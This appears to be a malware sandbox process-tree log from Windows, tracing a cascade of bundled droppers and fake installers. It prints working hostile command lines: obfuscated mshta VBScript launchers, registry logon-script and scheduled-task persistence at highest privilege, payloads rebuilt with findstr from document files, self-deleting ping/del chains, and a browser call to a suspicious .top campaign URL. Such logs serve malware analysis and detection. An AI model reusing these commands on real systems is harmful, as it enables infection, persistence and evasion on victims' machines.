C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe"9⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a10⤵
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631016349 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵
- Enumerates connected drives
-
C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe"C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7219⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CM267.tmp\IBInstaller_74449.tmp"C:\Users\Admin\AppData\Local\Temp\is-CM267.tmp\IBInstaller_74449.tmp" /SL5="$604E2,14736060,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 72110⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-BO10U.tmp\{app}\microsoft.cab -F:* %ProgramData%11⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-BO10U.tmp\{app}\microsoft.cab -F:* C:\ProgramData12⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f12⤵
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"11⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-BO10U.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-BO10U.tmp\{app}\vdi_compiler"11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 30412⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=72111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=72112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2346f8,0x7ffcad234708,0x7ffcad23471813⤵
-
C:\Users\Admin\AppData\Local\Temp\vpn.exe"C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=7209⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PVCIT.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-PVCIT.tmp\vpn.tmp" /SL5="$9047C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=72010⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "11⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090112⤵
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "11⤵
- Loads dropped DLL
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Loads dropped DLL
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090112⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install11⤵
-
C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe"C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe" SID=717 CID=717 SILENT=1 /quiet9⤵
- Enumerates connected drives
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631016349 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"10⤵
-
C:\Users\Admin\AppData\Local\Temp\askinstall45.exe"C:\Users\Admin\AppData\Local\Temp\askinstall45.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 176410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe"C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5264 -s 23610⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Program crash
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe"C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe"9⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Users\Admin\Documents\iYu3Ekh_kYp3VMkQ6F2XXrkp.exe"C:\Users\Admin\Documents\iYu3Ekh_kYp3VMkQ6F2XXrkp.exe"10⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\_EGDhWSthk7tStn9F4Mb37kk.exe"C:\Users\Admin\Documents\_EGDhWSthk7tStn9F4Mb37kk.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 24011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\1Z0zZmTCS5oMVXRfdl0oicGa.exe"C:\Users\Admin\Documents\1Z0zZmTCS5oMVXRfdl0oicGa.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 27611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\R7e45MRyLv4ZNZ766LqjNugG.exe"C:\Users\Admin\Documents\R7e45MRyLv4ZNZ766LqjNugG.exe"10⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe11⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Nobile.docm11⤵
-
C:\Windows\SysWOW64\cmd.execmd12⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm13⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comRimasta.exe.com J13⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J14⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J15⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J16⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J17⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost13⤵
- Runs ping.exe
-
C:\Users\Admin\Documents\VVNRAGyjOsPCbjAYK7qE6DNI.exe"C:\Users\Admin\Documents\VVNRAGyjOsPCbjAYK7qE6DNI.exe"10⤵
-
C:\Users\Admin\Documents\cydo4oNKIvLkAEThaBw1zqxy.exe"C:\Users\Admin\Documents\cydo4oNKIvLkAEThaBw1zqxy.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 26011⤵
- Program crash
-
C:\Users\Admin\Documents\XI82U9g2elUXtS3Xbpjnmnqs.exe"C:\Users\Admin\Documents\XI82U9g2elUXtS3Xbpjnmnqs.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 28411⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Documents\TuFgENVO9VJPbqex5eHA0cK1.exe"C:\Users\Admin\Documents\TuFgENVO9VJPbqex5eHA0cK1.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 24011⤵
- Program crash
-
C:\Users\Admin\Documents\Fa8Hs3PWksjtS9XfeRowlh8S.exe"C:\Users\Admin\Documents\Fa8Hs3PWksjtS9XfeRowlh8S.exe"10⤵
-
C:\Users\Admin\Documents\Fa8Hs3PWksjtS9XfeRowlh8S.exeC:\Users\Admin\Documents\Fa8Hs3PWksjtS9XfeRowlh8S.exe11⤵
-
C:\Users\Admin\Documents\P0ASX7ClDZkqrWrk5Yos9ImU.exe"C:\Users\Admin\Documents\P0ASX7ClDZkqrWrk5Yos9ImU.exe"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\P0ASX7ClDZkqrWrk5Yos9ImU.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\P0ASX7ClDZkqrWrk5Yos9ImU.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\P0ASX7ClDZkqrWrk5Yos9ImU.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\P0ASX7ClDZkqrWrk5Yos9ImU.exe" ) do taskkill /f -im "%~nxA"12⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "P0ASX7ClDZkqrWrk5Yos9ImU.exe"13⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXEX4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV ""== """" for %A IN (""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if "-PXPoqL0iOUHHP7hXFattB5ZvsV "== "" for %A IN ("C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"15⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj14⤵
-
C:\Users\Admin\Documents\bWPeeD60Vsu4ib9lxUilR8TX.exe"C:\Users\Admin\Documents\bWPeeD60Vsu4ib9lxUilR8TX.exe"10⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\bWPeeD60Vsu4ib9lxUilR8TX.exe"C:\Users\Admin\Documents\bWPeeD60Vsu4ib9lxUilR8TX.exe"11⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\cb9ME0QxSe9LyFuukchnURzj.exe"C:\Users\Admin\Documents\cb9ME0QxSe9LyFuukchnURzj.exe"10⤵
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"11⤵
-
C:\Users\Admin\Documents\PDbz91bUg9M7aGBRtrVqnWej.exe"C:\Users\Admin\Documents\PDbz91bUg9M7aGBRtrVqnWej.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7016 -s 28413⤵
- Program crash
-
C:\Users\Admin\Documents\k0btxAC1ooSYo9wTMjOC6nym.exe"C:\Users\Admin\Documents\k0btxAC1ooSYo9wTMjOC6nym.exe"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\Users\Admin\Documents\k0btxAC1ooSYo9wTMjOC6nym.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\Users\Admin\Documents\k0btxAC1ooSYo9wTMjOC6nym.exe"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\Documents\k0btxAC1ooSYo9wTMjOC6nym.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\Users\Admin\Documents\k0btxAC1ooSYo9wTMjOC6nym.exe" ) do taskkill /Im "%~NxB" /F14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "k0btxAC1ooSYo9wTMjOC6nym.exe" /F15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXEGZ9~4QZ~O.EXe -P6_oIH__Ioj5q15⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if ""-P6_oIH__Ioj5q "" =="""" for %B iN ( ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )16⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "-P6_oIH__Ioj5q " =="" for %B iN ( "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE" ) do taskkill /Im "%~NxB" /F17⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" T~DJNB.F -u /S16⤵
-
C:\Users\Admin\Documents\Ky9cjkHvbN1ZZPu6s15t_GEW.exe"C:\Users\Admin\Documents\Ky9cjkHvbN1ZZPu6s15t_GEW.exe" /mixtwo12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 28013⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Documents\lcg1AhcpVH4b8ia0WF0jpWNh.exe"C:\Users\Admin\Documents\lcg1AhcpVH4b8ia0WF0jpWNh.exe"12⤵
-
C:\ProgramData\6399518.exe"C:\ProgramData\6399518.exe"13⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3828 -s 220414⤵
- Program crash
-
C:\ProgramData\4109789.exe"C:\ProgramData\4109789.exe"13⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"14⤵
-
C:\ProgramData\1334818.exe"C:\ProgramData\1334818.exe"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCript:cloSe (crEateoBjECt("WscRipT.ShelL"). ruN( "cMD.EXE /c cOPY /Y ""C:\ProgramData\1334818.exe"" T2qzzHJjB1IL.eXe&& START T2QzzhJjB1IL.ExE /PcFM2d8NWvl_DASq10FK9czyFRU& iF """" == """" for %a in (""C:\ProgramData\1334818.exe"" ) do taskkill /im ""%~Nxa"" -f ",0, TRUE ) )14⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cOPY /Y "C:\ProgramData\1334818.exe" T2qzzHJjB1IL.eXe&&START T2QzzhJjB1IL.ExE /PcFM2d8NWvl_DASq10FK9czyFRU&iF ""== "" for %a in ("C:\ProgramData\1334818.exe" ) do taskkill /im "%~Nxa" -f15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "1334818.exe" -f16⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\T2qzzHJjB1IL.eXeT2QzzhJjB1IL.ExE /PcFM2d8NWvl_DASq10FK9czyFRU16⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCript:cloSe (crEateoBjECt("WscRipT.ShelL"). ruN( "cMD.EXE /c cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\T2qzzHJjB1IL.eXe"" T2qzzHJjB1IL.eXe&& START T2QzzhJjB1IL.ExE /PcFM2d8NWvl_DASq10FK9czyFRU& iF ""/PcFM2d8NWvl_DASq10FK9czyFRU"" == """" for %a in (""C:\Users\Admin\AppData\Local\Temp\T2qzzHJjB1IL.eXe"" ) do taskkill /im ""%~Nxa"" -f ",0, TRUE ) )17⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cOPY /Y "C:\Users\Admin\AppData\Local\Temp\T2qzzHJjB1IL.eXe" T2qzzHJjB1IL.eXe&&START T2QzzhJjB1IL.ExE /PcFM2d8NWvl_DASq10FK9czyFRU&iF "/PcFM2d8NWvl_DASq10FK9czyFRU"== "" for %a in ("C:\Users\Admin\AppData\Local\Temp\T2qzzHJjB1IL.eXe" ) do taskkill /im "%~Nxa" -f18⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\2vB7M.hGv,TVfKbQAhkK17⤵
-
C:\ProgramData\2985193.exe"C:\ProgramData\2985193.exe"13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 198814⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\erTwSr8OMFrmskKjVjTntRHz.exe"C:\Users\Admin\Documents\erTwSr8OMFrmskKjVjTntRHz.exe"10⤵
-
C:\Users\Admin\Documents\AZr9xQ9u1mCEAfl425CgkdJT.exe"C:\Users\Admin\Documents\AZr9xQ9u1mCEAfl425CgkdJT.exe"10⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\LJ7pNyk71vl83hwZtnkMkgRK.exe"C:\Users\Admin\Documents\LJ7pNyk71vl83hwZtnkMkgRK.exe"10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\{66643F95-DFEF-40E1-B845-932610AECF50}\LJ7pNyk71vl83hwZtnkMkgRK.exeC:\Users\Admin\AppData\Local\Temp\{66643F95-DFEF-40E1-B845-932610AECF50}\LJ7pNyk71vl83hwZtnkMkgRK.exe /q"C:\Users\Admin\Documents\LJ7pNyk71vl83hwZtnkMkgRK.exe" /tempdisk1folder"C:\Users\Admin\AppData\Local\Temp\{66643F95-DFEF-40E1-B845-932610AECF50}" /IS_temp11⤵
-
C:\Windows\SysWOW64\MSIEXEC.EXE"C:\Windows\system32\MSIEXEC.EXE" /i "C:\Users\Admin\AppData\Local\Downloaded Installations\{4175BAA6-49B9-43E5-8B49-E892979E209E}\menageudrivers.msi" SETUPEXEDIR="C:\Users\Admin\Documents" SETUPEXENAME="LJ7pNyk71vl83hwZtnkMkgRK.exe"12⤵
- Enumerates connected drives
-
C:\Users\Admin\AppData\Local\Temp\MSIF803.tmp"C:\Users\Admin\AppData\Local\Temp\MSIF803.tmp"13⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\srvs.exe"C:\Users\Admin\AppData\Local\Temp\srvs.exe"14⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Users\Admin\AppData\Local\Temp\srrvs.exe"C:\Users\Admin\AppData\Local\Temp\srrvs.exe"14⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Sta.docx15⤵
-
C:\Windows\SysWOW64\cmd.execmd16⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cpRioVCHzxPARhqNKZxUSxSjBROxGBfdTAAnUmNDiQEXIwXcFphmhdHqsEGduiwRymHdMCSkkQNeQUEmUaPbhQeCTmufTbvZPMSpxGJrdehvDFpvquv$" Conduco.docx17⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost17⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tutti.exe.comTutti.exe.com s17⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tutti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tutti.exe.com s18⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tutti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tutti.exe.com s19⤵
-
C:\Users\Admin\AppData\Local\Temp\MSIF7D3.tmp"C:\Users\Admin\AppData\Local\Temp\MSIF7D3.tmp"13⤵
-
C:\Users\Admin\AppData\Local\Temp\MSIF736.tmp"C:\Users\Admin\AppData\Local\Temp\MSIF736.tmp"13⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"9⤵
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 10010⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 90010⤵
- Runs ping.exe
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-HP71N.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-HP71N.tmp\stats.tmp" /SL5="$40202,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-RET4B.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-RET4B.tmp\Setup.exe" /Verysilent10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit11⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'12⤵
- Loads dropped DLL
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"11⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit12⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'13⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵
-
